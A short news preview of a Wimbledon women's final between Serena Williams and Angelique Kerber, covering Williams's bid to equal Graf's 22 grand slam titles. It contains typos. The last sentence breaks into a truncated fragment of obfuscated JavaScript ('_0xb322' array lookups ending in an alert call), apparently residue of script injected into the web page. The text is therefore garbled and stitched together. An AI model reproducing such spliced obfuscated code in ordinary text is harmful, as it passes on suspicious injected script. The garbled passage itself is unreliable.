The number one seed American, Serena Williams will be looking to equalise Steffi Graf’s record of holding 22 grand slam titles when she faces off against the current Australiann Open champion Angelique Kerber in the women’s singles Wimbledon final on Saturday.

Serena progressed to the finals defeating Elena Vesnina in straight sets while Kerber overcame Venus Williams in a similar fashion to set up the finale encounter.

It will be a great opportunity for Serena to aim for three target with a single shot. She will seek revenge from Kerber for ousting Venus and thus avoiding an all Williams clash, she will also look to equalise Graf’s record- one that has eluded her for long and both of these can be done with a win in her ninth Wimbledon final.

On the other end, Kerber will be aiming to upset the top-ranked Serena so that she can write her own name down in the record books of becoming the first AGerman woman to clinch the Wimbledon crown since Graf in 1996. _0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
